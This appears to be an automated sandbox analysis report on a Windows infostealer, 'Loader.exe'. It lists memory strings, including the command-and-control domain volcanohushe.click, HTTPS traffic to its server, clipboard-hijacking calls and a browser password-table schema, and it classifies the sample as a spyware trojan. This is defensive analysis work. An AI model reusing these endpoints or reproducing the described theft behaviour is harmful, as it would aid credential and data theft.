Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/
Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/%app
Source: Loader.exe, 00000003.00000003.2205684949.0000000000A91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/M??
Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/T
Source: Loader.exe, 00000003.00000003.2325175528.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2343993161.0000000000B11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/api
Source: Loader.exe, 00000003.00000003.2324626659.0000000000B11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/api$P
Source: Loader.exe, 00000003.00000003.2299745097.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330397824.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409137229.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2300072128.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298552259.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298638638.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2325175528.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330501381.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/api2K
Source: Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409099739.0000000000AF5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/t
Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click/ts/M
Source: Loader.exe, 00000003.00000003.2298552259.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299745097.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click:443/api
Source: Loader.exe, 00000003.00000003.2325175528.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click:443/apiXMVQGAH.xlsxH
Source: Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://volcanohushe.click:443/apik
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Loader.exe, 00000003.00000003.2266368076.00000000033CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: Loader.exe, 00000003.00000003.2266368076.00000000033CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49754 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00433500

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_031B1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_031B1000

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00433500

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EBE094	0_2_00EBE094
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EB1000	0_2_00EB1000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00ED6102	0_2_00ED6102
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EC2AA1	0_2_00EC2AA1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00ED43FF	0_2_00ED43FF
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EC8D90	0_2_00EC8D90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00EC3EA0	0_2_00EC3EA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004098CE	3_2_004098CE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004230D3	3_2_004230D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426090	3_2_00426090
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042217D	3_2_0042217D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040D11B	3_2_0040D11B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C98C	3_2_0042C98C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00411BC0	3_2_00411BC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043DBAC	3_2_0043DBAC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00409400	3_2_00409400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004384B0	3_2_004384B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041052C	3_2_0041052C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043FEF0	3_2_0043FEF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00440770	3_2_00440770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004387D0	3_2_004387D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00429070	3_2_00429070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00409000	3_2_00409000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428000	3_2_00428000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041C0C0	3_2_0041C0C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004058D0	3_2_004058D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004038D0	3_2_004038D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423750	3_2_00423750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E8A7	3_2_0043E8A7
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042A950	3_2_0042A950
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041C920	3_2_0041C920
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004301D5	3_2_004301D5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004239E0	3_2_004239E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004391E1	3_2_004391E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408180	3_2_00408180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406180	3_2_00406180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00440180	3_2_00440180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041E990	3_2_0041E990
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041A190	3_2_0041A190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00419190	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041B9A0	3_2_0041B9A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418241	3_2_00418241
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041FA74	3_2_0041FA74
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00430A78	3_2_00430A78
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417207	3_2_00417207
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00433210	3_2_00433210
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428A31	3_2_00428A31
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415A3C	3_2_00415A3C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C2C1	3_2_0042C2C1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00404280	3_2_00404280
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004142A0	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417AB8	3_2_00417AB8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423B40	3_2_00423B40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041D350	3_2_0041D350
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421B00	3_2_00421B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D306	3_2_0042D306
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004163C0	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004393D0	3_2_004393D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004383D0	3_2_004383D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004073F0	3_2_004073F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D3F1	3_2_0042D3F1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00425380	3_2_00425380
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F380	3_2_0043F380
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422B84	3_2_00422B84
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041CB90	3_2_0041CB90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042D391	3_2_0042D391
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422BA0	3_2_00422BA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00404BB0	3_2_00404BB0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00440450	3_2_00440450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B46E	3_2_0042B46E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00436C7D	3_2_00436C7D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426430	3_2_00426430
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B435	3_2_0042B435
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418CE1	3_2_00418CE1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00439C8E	3_2_00439C8E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F490	3_2_0043F490
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040CC99	3_2_0040CC99
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040E49F	3_2_0040E49F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004374A3	3_2_004374A3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427D52	3_2_00427D52
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042856C	3_2_0042856C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415506	3_2_00415506
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427527	3_2_00427527
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043EDCE	3_2_0043EDCE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F5E0	3_2_0043F5E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00437D80	3_2_00437D80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041D5B0	3_2_0041D5B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406610	3_2_00406610
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042E617	3_2_0042E617
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00405E20	3_2_00405E20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427E22	3_2_00427E22
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428630	3_2_00428630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00430637	3_2_00430637
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426639	3_2_00426639
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00402ED0	3_2_00402ED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417EEE	3_2_00417EEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F690	3_2_0043F690
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415E9A	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00414EA0	3_2_00414EA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040F6AA	3_2_0040F6AA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042774C	3_2_0042774C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423750	3_2_00423750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421770	3_2_00421770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040AF23	3_2_0040AF23
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F730	3_2_0043F730
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043C730	3_2_0043C730
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00410FC8	3_2_00410FC8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426FD0	3_2_00426FD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00437FE0	3_2_00437FE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040A780	3_2_0040A780
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041CFA0	3_2_0041CFA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004257AC	3_2_004257AC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EBE094	3_2_00EBE094
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EB1000	3_2_00EB1000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00ED6102	3_2_00ED6102
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EC2AA1	3_2_00EC2AA1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00ED43FF	3_2_00ED43FF
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EC8D90	3_2_00EC8D90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00EC3EA0	3_2_00EC3EA0

Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00EBE5A0 appears 98 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00407F80 appears 48 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00ECBE0D appears 40 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00EC75AB appears 42 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00414290 appears 76 times

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Loader.exe

Static PE information: Section: .bss ZLIB complexity 1.0003249845551894

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/1@1/1

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_004387D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_004387D0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe, 00000003.00000003.2235608394.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2207141098.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2207461953.00000000033B9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Loader.exe	ReversingLabs: Detection: 36%
Source: Loader.exe	Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\Loader.exe

File read: C:\Users\user\Desktop\Loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: profapi.dll	Jump to behavior
